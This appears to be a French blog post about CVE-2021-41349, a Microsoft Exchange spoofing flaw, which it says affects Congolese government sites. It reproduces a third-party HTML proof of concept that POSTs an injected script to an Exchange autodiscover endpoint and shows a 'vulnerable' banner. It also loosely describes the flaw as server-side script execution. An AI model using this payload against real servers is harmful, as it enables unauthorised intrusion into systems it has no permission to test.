Dans le cadre de nos recherches en cybersécurité, nous avons découvert une vulnérabilité critique, identifiée sous la référence CVE-2021-41349, affectant des sites web appartenant aux gouvernements congolais. Notre objectif principal est de promouvoir un internet plus sécurisé pour tous. En identifiant et signalant ces failles, nous souhaitons sensibiliser les administrateurs de sites web et les autorités sur l'importance de maintenir des systèmes protégés contre les menaces en ligne.
La vulnérabilité concerne spécifiquement Microsoft Exchange Server, un outil de communication utilisé par de nombreuses organisations, y compris des entités gouvernementales. Les attaques exploitant cette faille permettent à un attaquant de manipuler les requêtes HTTP envoyées au serveur Exchange, ce qui peut entraîner l'exécution de scripts malveillants.
Le Développement de la Vulnérabilité
CVE-2021-41349 permet à un attaquant de profiter d'une mauvaise gestion des requêtes envoyées par un serveur Exchange non sécurisé, en particulier dans le cadre d'un échange d'informations sensibles. L'attaque repose sur une manipulation de l'en-tête HTTP de la requête, permettant ainsi l'exécution de scripts sur le serveur cible.
Proof of Concept (POC) : L’Exploitation de la Faiblesse
Dans le but de démontrer l'ampleur de la vulnérabilité, un Proof of Concept (POC) a été développé par un chercheur en sécurité, 0xRobiul, pour reproduire cette attaque. Nous tenons à créditer l'auteur de ce POC pour sa contribution précieuse à la démonstration de cette vulnérabilité. Le code suivant montre comment un attaquant pourrait envoyer une requête POST pour injecter un script malveillant dans une page web vulnérable. Nous soulignons que cette faille nécessite une action immédiate de la part des responsables de la sécurité pour empêcher toute exploitation par des acteurs malveillants.
Le Code du POC
<html>
<!--POC Generated By 0xRobiul-->
<title>CVE-2021-41349 POC</title>
<body>
<h1>Microsoft Exchange Server Spoofing (CVE-2021-41349) POC By 0xRobiul</h1>
<script>history.pushState('', '', '/')</script>
<form action="https://site.com/autodiscover/autodiscover.json" method="POST">
<!-- Message en boucle dans un champ caché -->
<input type="hidden" name="<script>document.body.innerHTML+='<div style=\'color:green;font-family:monospace;font-size:20px;padding:10px'>Ce site est vulnérable!</div>';</script>" value=""</script>" />
<input type="hidden" name="x" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
setInterval(function() {
document.body.innerHTML += "<div style='color:green; font-family:monospace; font-size:20px; padding:10px;'>Ce site est vulnérable !</div>";
}, 1000);
</script>
</body>
</html>
La Conclusion : Un Appel à la Vigilance
Nous soulignons l'importance de la réactivité face à cette vulnérabilité. Les sites web gouvernementaux congolais, ainsi que tous les sites utilisant Microsoft Exchange Server, doivent impérativement être sécurisés pour éviter toute exploitation de cette faille. La cybersécurité est l'affaire de tous, et chaque acteur en ligne a un rôle à jouer dans la protection des informations sensibles et des infrastructures critiques.